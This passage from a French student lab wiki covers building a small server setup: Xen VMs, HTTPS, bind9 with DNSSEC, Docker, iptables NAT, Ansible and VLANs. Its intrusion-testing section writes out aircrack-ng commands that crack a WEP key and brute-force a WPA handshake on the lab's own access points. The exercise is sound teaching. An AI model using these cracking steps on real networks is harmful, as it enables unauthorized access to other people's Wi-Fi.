 &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Enfin pour enregistrer nos modifications :&lt;br /&gt;
  a2enmod ssl&lt;br /&gt;
  a2ensite mycoplasma2.site.conf&lt;br /&gt;
  service apache2 restart&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Comme on peut le voir sur la photo ci-dessous : nous avons accès à notre site de façon sécurisée.&lt;br /&gt;
[[Fichier:groupe2_https.png|center|500px|Nous avons accès au site sécurisé]]&lt;br /&gt;
&lt;br /&gt;
====Configuration bind9====&lt;br /&gt;
&lt;br /&gt;
BIND veut dire : Berkeley Internet Name Daemon&lt;br /&gt;
Nous avons déjà installer le package [http://www.example.com/ titre du lien ici].&lt;br /&gt;
&lt;br /&gt;
Ensuite il faut créer un fichier de configuration dans le dossier /etc/bind/ avec les informations de notre site: &lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:/etc/bind# cat mycoplasma2.site&lt;br /&gt;
&lt;br /&gt;
 ;&lt;br /&gt;
 ; BIND data file for local loopback interface&lt;br /&gt;
 ;&lt;br /&gt;
 $TTL	604800 &lt;br /&gt;
 @	IN	SOA	ns.chlamydiae.site. root.mycoplasma2.site (&lt;br /&gt;
  			4	; Serial&lt;br /&gt;
  			604800	; Refresh&lt;br /&gt;
 			86400	; Retry&lt;br /&gt;
 			2419200	; Expire&lt;br /&gt;
 			604800 )	; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 	IN	NS	ns.mycoplasma2.site.&lt;br /&gt;
 	IN	NS	ns6.gandi.net.&lt;br /&gt;
 @       IN      A       193.48.57.178&lt;br /&gt;
 ns	IN	A	193.48.57.178&lt;br /&gt;
 www	IN	A	193.48.57.178&lt;br /&gt;
&lt;br /&gt;
Il faut modifier le fichier named.conf.local pour lui donner le nom de notre fichier configuration et de définir les paramètres généraux d'une zone.:&lt;br /&gt;
 root@mycoplasma:/etc/bind# cat named.conf.local &lt;br /&gt;
&lt;br /&gt;
 zone &amp;quot;mycoplasma2.site&amp;quot; {&lt;br /&gt;
         type master;&lt;br /&gt;
         file &amp;quot;/etc/bind/mycoplasma2.site&amp;quot;; &lt;br /&gt;
         allow-transfer {217.70.177.40;}; &lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite relancer avec la commande suivante :&lt;br /&gt;
 service bind9 restart&lt;br /&gt;
&lt;br /&gt;
Il faut aussi ajouter dans l'onglet GlueRecords le nom de domaine de notre site, et celui de gandi.&lt;br /&gt;
&lt;br /&gt;
===Sécurisation de site web par certificat===&lt;br /&gt;
&lt;br /&gt;
On doit configurer apache2 en mode sécurisé à l’aide d’une clef asymétrique et d’un certificat signé par une autorité de certification. Le CA signe un CSR (Certificate Signing Request), pour ce faire il faut créer les clefs et le CSR en utilisant openssl. &lt;br /&gt;
Il faut ensuite le transformer en un certificat, on va donc configurer apache2 sur le port 443 afin qu'il puisse gérer du HTTPS. &lt;br /&gt;
&lt;br /&gt;
 openssl req -nodes -newkey rsa:2048 -sha256 -keyout myserver.key -out server.csr&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite renseigner quelques informations : &lt;br /&gt;
&lt;br /&gt;
   Country Name (2 letter code) [AU]: '''France'''&lt;br /&gt;
   State or Province Name (full name) [Some-State]: '''Haut de France'''&lt;br /&gt;
   Locality Name (eg, city) []: '''Lille'''&lt;br /&gt;
   Organization Name (eg, company) [Internet Widgits Pty Ltd]: '''Polytech Lille'''&lt;br /&gt;
   Organizational Unit Name (eg, section) []: IMA5&lt;br /&gt;
   Common Name (e.g. server FQDN or YOUR name) []: '''mycoplasma2.site'''&lt;br /&gt;
   Email Address []:&lt;br /&gt;
   Please enter the following 'extra' attributes to be sent with your certificate request&lt;br /&gt;
   A challenge password []:&lt;br /&gt;
   An optional company name []:&lt;br /&gt;
&lt;br /&gt;
La seule vraie ligne où il ne faut pas se tromper, c'est celle où l'on indique le nom du site (Common Name), si la ligne est fausse Gandi n'acceptera pas votre clef.&lt;br /&gt;
Une fois ces informations renseignées, une clef est générée. &lt;br /&gt;
&lt;br /&gt;
/!\ Il faut la garder précieusement et ne pas la SUPPRIMER des fichiers de la machine virtuelle, dans ce cas il faudra tout recommencer avec un nouveau nom de domaine parce que la clef n'est générable qu'une seule fois.&lt;br /&gt;
Il faut maintenant copier le contenu de ce fichier avec le &amp;quot;BEGIN CERTIFICATE REQUEST-----&amp;quot; et le &amp;quot;END CERTIFICATE REQUEST-----&amp;quot; sur le site de gandi.&lt;br /&gt;
&lt;br /&gt;
===Sécurisation de serveur DNS par DNSSEC===&lt;br /&gt;
 root@mycoplasma:/etc/bind# vim named.conf&lt;br /&gt;
&lt;br /&gt;
 include &amp;quot;/etc/bind/named.conf.options&amp;quot;;&lt;br /&gt;
 include &amp;quot;/etc/bind/named.conf.local&amp;quot;;&lt;br /&gt;
 include &amp;quot;/etc/bind/named.conf.default-zones&amp;quot;&lt;br /&gt;
&lt;br /&gt;
Pour générer les clefs dans un même dossier, il faut le créer voici le chemin pour notre groupe :&lt;br /&gt;
 root@mycoplasma:/etc/bind/mycoplasma2.site.dnssec# &lt;br /&gt;
&lt;br /&gt;
Pour générer les clés KSK on lance la commande suivante :&lt;br /&gt;
 dnssec-keygen -a RSASHA1 -b 2048 -f KSK -n ZONE mycoplasma2.site&lt;br /&gt;
Pour ZSK :&lt;br /&gt;
 dnssec-keygen -a RSASHA1 -b 1048 -n ZONE mycoplasma2.site&lt;br /&gt;
&lt;br /&gt;
On peut maintenant rajouter nos clefs dans le fichier mycoplasma2.site: &lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:~# cat /etc/bind/mycoplasma2.site&lt;br /&gt;
&lt;br /&gt;
 $TTL	604800&lt;br /&gt;
 '''$include /etc/bind/mycoplasma2.site.dnssec/mycoplasma2.site-ksk.key'''&lt;br /&gt;
 '''$include /etc/bind/mycoplasma2.site.dnssec/mycoplasma2.site-zsk.key'''&lt;br /&gt;
 @	IN	SOA	ns.chlamydiae.site. root.mycoplasma2.site (&lt;br /&gt;
  			4	; Serial&lt;br /&gt;
 			604800	; Refresh&lt;br /&gt;
 			86400	; Retry&lt;br /&gt;
 			2419200	; Expire&lt;br /&gt;
 			604800 )	; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 	IN	NS	ns.mycoplasma2.site.&lt;br /&gt;
 	IN	NS	ns6.gandi.net.&lt;br /&gt;
 @      IN      A       193.48.57.178&lt;br /&gt;
 ns	IN	A	193.48.57.178&lt;br /&gt;
 www	IN	A	193.48.57.178&lt;br /&gt;
&lt;br /&gt;
On signe les enregistrements de la zone en exécutant la commande suivante :&lt;br /&gt;
 dnssec-signzone -o mycoplasma2.site -k mycoplasma2.site-ksk ../mycoplasma2.site mycoplasma2.site-zsk&lt;br /&gt;
&lt;br /&gt;
Dernière étape, il fait ajouter le chemin du fichier pour utiliser le fichier de zone signé :&lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:~# cat /etc/bind/named.conf.local &lt;br /&gt;
&lt;br /&gt;
 zone &amp;quot;mycoplasma2.site&amp;quot; {&lt;br /&gt;
        type master;&lt;br /&gt;
        '''file &amp;quot;/etc/bind/mycoplasma2.site.signed&amp;quot;;''' &lt;br /&gt;
        allow-transfer {217.70.177.40;}; &lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 service bind9 restart&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Nous vérifions sous dnsviz.net le bon fonctionnement du DNSSEC :&lt;br /&gt;
[[Fichier:groupe2_dnsViz.png|center|500px]]&lt;br /&gt;
&lt;br /&gt;
===Serveur Freeradius===&lt;br /&gt;
&lt;br /&gt;
==Ferme de serveurs Web==&lt;br /&gt;
Il faut implanter une architecture d’équilibrage de charge pour un site Web.&lt;br /&gt;
&lt;br /&gt;
===Architecture générale de la ferme===&lt;br /&gt;
Pour ce faire, chaque binôme a créé une nouvelle machine virtuelle Xen qui hébergera un serveur Web. Ainsi chaque binôme pourra disposer de plusieurs serveurs Web proposant exactement le même site sur plusieurs machines différentes. Ces serveurs Web ne seront pas directement disponibles d’Internet mais au travers d’un équilibreur de charge tournant sur leur machine virtuelle principale.&lt;br /&gt;
&lt;br /&gt;
'''Nom de la Machine Virtuelle ''' : private-mycoplasma&lt;br /&gt;
&lt;br /&gt;
'''Commandes''': &lt;br /&gt;
La MV doit être créée sur Cordouan.&lt;br /&gt;
 root@zabethX:~# ssh root@cordouan.insecserv.deule.net &lt;br /&gt;
&lt;br /&gt;
 root@cordouan:~# xen-create-image --hostname=private-mycoplasma --ip=ip 192.168.0.2 --dir=/usr/local/xen&lt;br /&gt;
 root@cordouan:~# xl create private-mlycoplasma.cfg&lt;br /&gt;
&lt;br /&gt;
Il faut suivre les logs de la création de la machine virtuelle avec le fichier suivant:&lt;br /&gt;
 root@cordouan:~# tail -f /var/log/xen-tools/private-mycoplasma.log&lt;br /&gt;
&lt;br /&gt;
Pour accèder une première fois à la machine virtuelle, il faut utiliser cette commande car SSH n'est pas encore autorisé.&lt;br /&gt;
 root@cordouan:~# xl console private-mycoplasma&lt;br /&gt;
&lt;br /&gt;
Pour l'activer voici les modifications, il faut remplacer la ligne suivante de ce fichier /etc/ssh/sshd_config :&lt;br /&gt;
 &amp;quot; #PermitRootLogin prohibit-password&amp;quot;  '''par'''  &amp;quot; PermitRootLogin yes&amp;quot; &lt;br /&gt;
&lt;br /&gt;
Il est possible de se connecter en SSH  et de paramétrer le proxy : &lt;br /&gt;
 root@cordouan:~# ssh root@192.168.0.2&lt;br /&gt;
 root@private-mycoplasma:~# export http_proxy=http://proxy.plil.fr:3128&lt;br /&gt;
 root@private-mycoplasma:~# export https_proxy=http://proxy.plil.fr:3128&lt;br /&gt;
 root@private-mycoplasma:~# xen-create-image --hostname=herpesgenital --dhcp --dir=/usr/local/xen --force&lt;br /&gt;
&lt;br /&gt;
Il faut modifier l'adresse mac, pour avoir une adresse mac unique pour chaque binôme, et il faut configurer le bridge.&lt;br /&gt;
 vif = [ 'mac=00:16:3E:2B:FF:6A,bridge=IMA5sc-priv' ]&lt;br /&gt;
&lt;br /&gt;
Voici notre nouvelle structure :&lt;br /&gt;
[[Fichier:G2_Structure.png|center|800px]]&lt;br /&gt;
&lt;br /&gt;
Pour y arriver, il faut modifier les fichiers /etc/network/interfaces des deux machines virtuelles avec les adresses, Gateway, et netmask marque sur la photo ci-dessus. Et valider les modifications avec les commandes habituelles : ifdown eth'''i''' et ifup eth'''i'''&lt;br /&gt;
&lt;br /&gt;
=== Mascarade ===&lt;br /&gt;
&lt;br /&gt;
 iptables -P FORWARD DROP&lt;br /&gt;
 iptables -A FORWARD -j ACCEPT -s 192.168.0.0/24&lt;br /&gt;
 iptables -A FORWARD -j ACCEPT -d 192.168.0.0/24&lt;br /&gt;
 iptables -t nat -A POSTROUTING -j MASQUERADE -s 192.168.0.0/24&lt;br /&gt;
 echo 1 &amp;gt; /proc/sys/net/ipv4/ip_forward&lt;br /&gt;
 apt install iptables-persistent&lt;br /&gt;
 &lt;br /&gt;
Il faut ensuite décommenter &lt;br /&gt;
 net.ipv4.ipforward=1&lt;br /&gt;
&lt;br /&gt;
=== Création du conteneur ===&lt;br /&gt;
&lt;br /&gt;
Il est important dans cette partie que tous les binômes se mettent d'accord pour installer le même package de docker &lt;br /&gt;
 root@mycoplasma:~/#  ansible-galaxy install geerlingguy.docker&lt;br /&gt;
&lt;br /&gt;
Voici le fichier DockerFile que l'on a codé :&lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:~/test# cat docker/Dockerfile &lt;br /&gt;
&lt;br /&gt;
 FROM centos:latest&lt;br /&gt;
 MAINTAINER NewstarCorporation&lt;br /&gt;
 RUN yum -y install httpd&lt;br /&gt;
 COPY mycoplasma/index.html /var/wwww/html/index.html&lt;br /&gt;
 CMD [&amp;quot;/usr/sbin/httpd&amp;quot;, &amp;quot;-D&amp;quot;, &amp;quot;FOREGROUND&amp;quot;]&lt;br /&gt;
 EXPOSE 80&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
On a eu le problème suivant lorsqu'on souhaite visiter notre site : &lt;br /&gt;
&lt;br /&gt;
[[Fichier:G2_mycoplasmaSite.png|center|900px]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 root@corduan:~/# docker ps =&amp;gt; Notre docker &amp;quot;mycoplasma&amp;quot;  tourne donc  ce n'est pas le problème.&lt;br /&gt;
&lt;br /&gt;
 root@corduan:~/# docker exec -it &amp;lt;CONTAINER ID&amp;gt; /bash/bin &lt;br /&gt;
 root@&amp;lt;CONTAINER ID&amp;gt;:~/# ls /var/www/html &lt;br /&gt;
&lt;br /&gt;
Avec cette dernière commande, on peut voir que le fichier index.html ne s'est pas copié malgré les commandes du Dockerfile. Pourtant le Docker build s'est exécuté sans afficher d'erreurs. On peut voir les logs pour avoir une idée : &lt;br /&gt;
  root@corduan:~/# docker logs &amp;lt;CONTAINER ID&amp;gt;&lt;br /&gt;
Voici le résultat : &lt;br /&gt;
 AH00558: httpd: Could not reliably determine the server's fully qualified domain name, using 172.17.0.5. Set the 'ServerName' directive globally to suppress this message&lt;br /&gt;
&lt;br /&gt;
=== Configuration des serveurs internes ===&lt;br /&gt;
&lt;br /&gt;
===Equilibreur de charge===&lt;br /&gt;
&lt;br /&gt;
==Tests d’intrusion==&lt;br /&gt;
&lt;br /&gt;
=== Cassage de clef WEP d’un point d’accès WiFi ===&lt;br /&gt;
Pour scanner l'environnement Wi-Fi, on utilise l'outil airodump-ng. On remarque qu'il y a deux types de wifi, les cracottes avec un c et les kracottes avec un k.&lt;br /&gt;
On lance l'interface en mode moniteur : &lt;br /&gt;
 airmon-ng start  wlan0mon&lt;br /&gt;
 airodump-ng --encrypt wep wlan0mon&lt;br /&gt;
&lt;br /&gt;
On a choisi de casser la clé WEP de la cracotte5 sur le channel 2, on enregistre les paquets dans webPack.&lt;br /&gt;
 airodump-ng -c 2 –-bssid 04:DA:D2:9C:5O:5A -w wepPack wlan0mon&lt;br /&gt;
&lt;br /&gt;
La commande suivante permet de se faire passer pour un client afin de générer de l'activité sur le réseau.&lt;br /&gt;
 aireplay-ng --fakeauth 30 -a 04:DA:D2:9C:5O:5A wlan0mon&lt;br /&gt;
&lt;br /&gt;
On utilise les paquets enregistrés pour réaliser le cassage:&lt;br /&gt;
 aircrack-ng wepDico*.cap&lt;br /&gt;
&lt;br /&gt;
[[Fichier:g2_wep.png|center|600 px]]&lt;br /&gt;
&lt;br /&gt;
=== Cassage de mot de passe WPA-PSK par force brute ===&lt;br /&gt;
Il faut lancer la commande ip a : récupérer le nom de l'interface wifi : &amp;quot;&amp;quot;wlx40a5ef0f6518&amp;quot;&amp;quot;. Il faut le lancer avec la commande :&lt;br /&gt;
 airmon-ng start wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite écouter le réseau, on récupère alors le channel(2), le nom du wifi, le BSSID (04:DA:D2:9C:5O:5A) avec la commande suivante:&lt;br /&gt;
 airodump-ng --encrypt wpa wlan0mon&lt;br /&gt;
Nous avons choisi de cracker &amp;quot;kracote03&amp;quot;&lt;br /&gt;
&lt;br /&gt;
 airodump-ng wlan0mon --bssid 04:DA:D2:9C:5O:5A --ch 2 -w capture&lt;br /&gt;
&lt;br /&gt;
Il faut l'arreter une fois qu'on obtient un handshake &lt;br /&gt;
&lt;br /&gt;
[[Fichier:G2_WPA.png| 800 px|center]]&lt;br /&gt;
&lt;br /&gt;
Pour générer un dictionnaire, on a besoin de la commande suivante : &lt;br /&gt;
 sudo apt-get update&lt;br /&gt;
 sudo apt-get install crunch&lt;br /&gt;
&lt;br /&gt;
 crunch 8 8 -o dico.txt 0123456789&lt;br /&gt;
&lt;br /&gt;
* 8 8 : donne des codes de 8 caractères au minimum et au maximum&lt;br /&gt;
&lt;br /&gt;
On lance cette commande : &lt;br /&gt;
 airodump-ng -c 2 --bssid 04:DA:D2:9C:5O:5A -w ./home/pifou/crack wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
Voici une capture de la commande :&lt;br /&gt;
 aircrack crack/capture.cap -w dico.txt &lt;br /&gt;
[[Fichier:G2_catch.png|center]]&lt;br /&gt;
&lt;br /&gt;
On remarque ce la photo ci dessus que la commande a pris 21 min et 42 sec.&lt;br /&gt;
&lt;br /&gt;
== Partie  ASR ==&lt;br /&gt;
&lt;br /&gt;
=== Ansible ===&lt;br /&gt;
&lt;br /&gt;
Ansible permet l'automatisation par connexion sans mot de passe.&lt;br /&gt;
Il faut d'abord générer une clef asymétrique :&lt;br /&gt;
 ssh-keygen -t rsa&lt;br /&gt;
&lt;br /&gt;
Installation de la clef publique sur les machines virtuelles 192.168.0.1 à 192.168.0.6  :&lt;br /&gt;
 cat .ssh/id_rsa.pub | ssh 192.168.0.1 &amp;quot;cat &amp;gt;&amp;gt; /root/.ssh/authorized_keys2&amp;quot;&lt;br /&gt;
&lt;br /&gt;
Il faut  installer Ansible : &lt;br /&gt;
 apt install ansible&lt;br /&gt;
====Hosts====&lt;br /&gt;
Ensuite il faut rédiger l'inventaire ( /etc/ansible/hosts ) c'est un fichier yaml, il faut très attention à la syntaxe. Ce fichier regroupe le parc informatique :&lt;br /&gt;
&lt;br /&gt;
 all:&lt;br /&gt;
 hosts:&lt;br /&gt;
  interne:&lt;br /&gt;
    ansible_host: 192.168.0.2&lt;br /&gt;
 children:&lt;br /&gt;
  serveur-web:&lt;br /&gt;
   hosts:&lt;br /&gt;
    192.168.0.[1:6]&lt;br /&gt;
&lt;br /&gt;
====Playbooks====&lt;br /&gt;
&lt;br /&gt;
Maintenant qu'on a défini toutes les machines dans notre parc et qu'on peut se connecter automatique, on peut exécuter une commande à distance sur tout le parc à l'aide d'Ansible.&lt;br /&gt;
Un &amp;quot;playbook&amp;quot; c'est une liste des tâches à effectuer sur ces machines.&lt;/div&gt;</summary>
		<author><name>Aaitmouh</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2019/2020_G2&amp;diff=52014</id>
		<title>TP sysres IMA5sc 2019/2020 G2</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2019/2020_G2&amp;diff=52014"/>
				<updated>2020-01-05T15:10:38Z</updated>
		
		<summary type="html">&lt;p&gt;Aaitmouh : /* Création des Réseaux virtuels */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;__TOC__&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot;/&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Présentation générale=&lt;br /&gt;
&lt;br /&gt;
Travaux pratiques protocoles avancés. Cet atelier consiste en la réalisation d’une maquette de réseau permettant de manipuler les protocoles de redondance réseau ainsi que le protocole réseau IPv6.&lt;br /&gt;
&lt;br /&gt;
Le cours se trouve à cette [https://rex.plil.fr/Enseignement/Reseau/Reseau.IMA5sc/ adresse]&lt;br /&gt;
Le sujet du TP se trouve à cette [https://rex.plil.fr/Enseignement/Reseau/Protocoles.IMA5sc/reseau.html adresse]&lt;br /&gt;
&lt;br /&gt;
=Réalisation du TP=&lt;br /&gt;
&lt;br /&gt;
== Installation dans la machine virtuelle Xen ==&lt;br /&gt;
Nous avons acheté notre domaine : mycoplasma.site sur le site gandi. Il faut créer la machine virtuelle Xen Linux sur le ''dom0 cordouan.insecserv.deule.net''&lt;br /&gt;
&lt;br /&gt;
Donc il faut se connecter en shh à Cordouan: &lt;br /&gt;
 ssh root@cordouan.insecserv.deule.net&lt;br /&gt;
&lt;br /&gt;
Puis créer notre machine virtuelle : &lt;br /&gt;
 xen-create-image --hostname=mycoplasma --dhcp --dir=/usr/local/xen --dist=buster&lt;br /&gt;
 xl create mycoplasma.cfg&lt;br /&gt;
&lt;br /&gt;
On a ensuite installer les paquetages nécessaires pour SSH, le serveur Web apache2 et le serveur DNS bind :&lt;br /&gt;
 sudo apt-get install openssh-server&lt;br /&gt;
 sudo apt-get install apache2&lt;br /&gt;
 sudo apt-get install -y bind9&lt;br /&gt;
&lt;br /&gt;
Pour afficher les logs et savoir si l'installation à bien lieu : &lt;br /&gt;
   tail -f /var/log/xen-tools/mycoplasma.log&lt;br /&gt;
=== Accès Internet et Permettre SSH ===&lt;br /&gt;
Une fois la VM créée (semaine 1), il faut installer les packages, donc il faut lui donner l'accès à internet. Il faut modifier le fichier suivant etc/network/interfaces. Pour enregistrer les modifications, il faut exécuter les commandes: if down eth0, ifup eth0.&lt;br /&gt;
 &lt;br /&gt;
 auto eth0&lt;br /&gt;
 iface eth0 inet static&lt;br /&gt;
  address 193.48.57.178&lt;br /&gt;
  netmask 255.255.255.240&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Pour le moment, pour se connecter à la Machine virtuelle, on utilise la commande suivante: &lt;br /&gt;
 xl console mycoplasma&lt;br /&gt;
&lt;br /&gt;
====SSH====&lt;br /&gt;
Mais il y a une seconde façon d'accéder à notre VM: c'est en utilisant SSH. Pour le faire il faut remplacer la ligne suivante :&lt;br /&gt;
 &amp;quot; #PermitRootLogin prohibit-password&amp;quot; &lt;br /&gt;
par &lt;br /&gt;
 &amp;quot; PermitRootLogin yes&amp;quot; &lt;br /&gt;
de ce fichier etc/ssh/sshd_config.&lt;br /&gt;
&lt;br /&gt;
== Architecture réseau ==&lt;br /&gt;
&lt;br /&gt;
=== L’architecture générale ===&lt;br /&gt;
[[Fichier:mejbar-aitmouheb-infra-generale.png|right|180 px|thumb]]&lt;br /&gt;
L'objectif que l'on souhaite réaliser dans cette partie est une architecture capable de résister à la défaillance de quelques uns des équipements réseau qui la composent par le biais de la redondance.&lt;br /&gt;
&lt;br /&gt;
Nous disposons, pour la réalisation, de deux commutateurs et de deux routeurs et deux bornes wifi répartis entre les deux salles E304 et E306. &lt;br /&gt;
&lt;br /&gt;
Nous avons sur les deux terminaisons de notre architecture:&lt;br /&gt;
&lt;br /&gt;
* Le serveur XEN qui abrite des machines virtuelles avec les différents services qui y sont implantés.&lt;br /&gt;
* Le réseau de l'école.&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
Le schéma de principe ci-joint, résume l'architecture proposée.&lt;br /&gt;
&lt;br /&gt;
On peut ainsi voir à partir de ce schéma que tant que nous avons au minimum un routeur et un commutateur fonctionnels l’infrastructure pourra toujours assurer le service&lt;br /&gt;
&lt;br /&gt;
Entre autres, on doit satisfaire le cahier des charges suivant:&lt;br /&gt;
* Un routage IPv4&lt;br /&gt;
* Un routage IPv6&lt;br /&gt;
* Interconnexion avec Internet (IPv4)&lt;br /&gt;
* Interconnexion avec Internet (IPv6)&lt;br /&gt;
* Sécurisation du réseau en implantant le protocol VRRP sur les routeurs.&lt;br /&gt;
* Confguration des bornes wifi&lt;br /&gt;
&lt;br /&gt;
===Organisation du travail ===&lt;br /&gt;
[[Fichier:mejbar-aitmouheb-infra-E304.png|right|180 px|thumb]]&lt;br /&gt;
Nous avons pris l'initiative de nous répartir la réalisation de l'infrastructure et notre groupe s'est principalement chargé de l'implémentation sur la partie E304.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Sur cette partie nous devons donc configurer le commutateur (COM-1) pour:&lt;br /&gt;
* Communiquer avec la serveur XEN&lt;br /&gt;
* Communiquer avec le routeur R1 en E304 et le R2 en E306.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Et configurer le routeur R1 pour:&lt;br /&gt;
* L'interconnexion des deux commutateurs COM-1 et COM-2 avec le réseau de l'école et internet &lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Le schéma proposé à droite résume le choix des interfaces pour la réalisation de l'interconnexion des équipements.&lt;br /&gt;
&lt;br /&gt;
===Réalisation===&lt;br /&gt;
Rappelons la table des adressages convenue en phase d'architecture:&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Nom !! VLAN !! Réseau IPV4 !! Réseau IPV6 !! IP routeur 1 !! IP routeur 2 !! Routeur virtuel !! Nom VM !! IP VM !! IP VM Private&lt;br /&gt;
|-&lt;br /&gt;
| XEN&lt;br /&gt;
| 200&lt;br /&gt;
| 193.48.57.176/28 &lt;br /&gt;
| 2001:660:4401:60AB::/64 &lt;br /&gt;
| 193.48.57.188/28&lt;br /&gt;
| 193.48.57.189/28&lt;br /&gt;
| 193.48.57.190/28&lt;br /&gt;
| ***&lt;br /&gt;
| 193.48.57.176/28&lt;br /&gt;
| ***&lt;br /&gt;
|-&lt;br /&gt;
| Interconnection&lt;br /&gt;
| 131&lt;br /&gt;
| 10.60.100.0/24&lt;br /&gt;
| ***&lt;br /&gt;
| 10.60.100.1/24&lt;br /&gt;
| 10.60.100.2/24&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 1&lt;br /&gt;
| 101 &lt;br /&gt;
| 10.60.101.0/24&lt;br /&gt;
| 2001:660:4401:60A1::/64 &lt;br /&gt;
| 10.60.101.1/24&lt;br /&gt;
| 10.60.101.2/24&lt;br /&gt;
| 10.60.101.3/24&lt;br /&gt;
| 6phil&lt;br /&gt;
| 193.48.57.177/28&lt;br /&gt;
| 192.168.0.1&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 2&lt;br /&gt;
| 102&lt;br /&gt;
| 10.60.102.0/24&lt;br /&gt;
| 2001:660:4401:60A2::/64 &lt;br /&gt;
| 10.60.102.1/24&lt;br /&gt;
| 10.60.102.2/24&lt;br /&gt;
| 10.60.102.3/24&lt;br /&gt;
| mycoplasma&lt;br /&gt;
| 193.48.57.178/28&lt;br /&gt;
| 192.168.0.2&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 3&lt;br /&gt;
| 103 &lt;br /&gt;
| 10.60.103.0/24&lt;br /&gt;
| 2001:660:4401:60A3::/64&lt;br /&gt;
| 10.60.103.1/24&lt;br /&gt;
| 10.60.103.2/24&lt;br /&gt;
| 10.60.103.3/24&lt;br /&gt;
| herpesgenital&lt;br /&gt;
| 193.48.57.179/28&lt;br /&gt;
| 192.168.0.3&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 4&lt;br /&gt;
| 104 &lt;br /&gt;
| 10.60.104.0/24&lt;br /&gt;
| 2001:660:4401:60A4::/64 &lt;br /&gt;
| 10.60.104.1/24&lt;br /&gt;
| 10.60.104.2/24&lt;br /&gt;
| 10.60.104.3/24&lt;br /&gt;
| chlamydiae&lt;br /&gt;
| 193.48.57.180/28&lt;br /&gt;
| 192.168.0.4&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 5&lt;br /&gt;
| 105 &lt;br /&gt;
| 10.60.105.0/24&lt;br /&gt;
| 2001:660:4401:60A5::/64 &lt;br /&gt;
| 10.60.105.1/24&lt;br /&gt;
| 10.60.105.2/24&lt;br /&gt;
| 10.60.105.3/24&lt;br /&gt;
| chaudepisse&lt;br /&gt;
| 193.48.57.181/28&lt;br /&gt;
| 192.168.0.5&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 6&lt;br /&gt;
| 106 &lt;br /&gt;
| 10.60.106.0/24&lt;br /&gt;
| 2001:660:4401:60A6::/64 &lt;br /&gt;
| 10.60.106.1/24&lt;br /&gt;
| 10.60.106.2/24&lt;br /&gt;
| 10.60.106.3/24&lt;br /&gt;
| blennoragie&lt;br /&gt;
| 193.48.57.182/28&lt;br /&gt;
| 192.168.0.6&lt;br /&gt;
|-&lt;br /&gt;
| Autres&lt;br /&gt;
| 300&lt;br /&gt;
| 10.60.200.0/24&lt;br /&gt;
| 2001:660:4401:60AA::/64 &lt;br /&gt;
| 10.60.200.1/24&lt;br /&gt;
| 10.60.200.2/24&lt;br /&gt;
| 10.60.200.3/24&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Comme on peut le voir, les VMs exposées possèdent chacune deux adresses IPv4 sur deux réseaux différents:&lt;br /&gt;
#Le réseau routé     :  193.48.57.176/28      (Class C)&lt;br /&gt;
#Le réseau non-routé :  10.10.0.0/16          (Class A)&lt;br /&gt;
&lt;br /&gt;
Nous devons allouer sur le réseau non-routé, dit privé, un VLAN pour chaque groupe pour qu'il puisse y connecter son client Wifi en plus des VLANs fonctionnels.&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
====Configuration du commutateur 1 (COM-1)====&lt;br /&gt;
&lt;br /&gt;
=====Création des VLANs=====&lt;br /&gt;
Pour la création des VLANs nous utilisons la suite de commandes ci-dessous:&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
  vlan &amp;lt;NUMERO&amp;gt;&lt;br /&gt;
   name &amp;lt;NOM&amp;gt;&lt;br /&gt;
   exit&lt;br /&gt;
  exit&lt;br /&gt;
 write&lt;br /&gt;
&lt;br /&gt;
avec les couples de valeurs:&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! &amp;lt;NUMERO&amp;gt; !! &amp;lt;NOM&amp;gt; &lt;br /&gt;
|-&lt;br /&gt;
| 101&lt;br /&gt;
| VLAN0101&lt;br /&gt;
|-&lt;br /&gt;
| 102&lt;br /&gt;
| VLAN0102 &lt;br /&gt;
|-&lt;br /&gt;
| 103&lt;br /&gt;
| VLAN0103&lt;br /&gt;
|-&lt;br /&gt;
| 104&lt;br /&gt;
| VLAN0104&lt;br /&gt;
|-&lt;br /&gt;
| 105&lt;br /&gt;
| VLAN0105&lt;br /&gt;
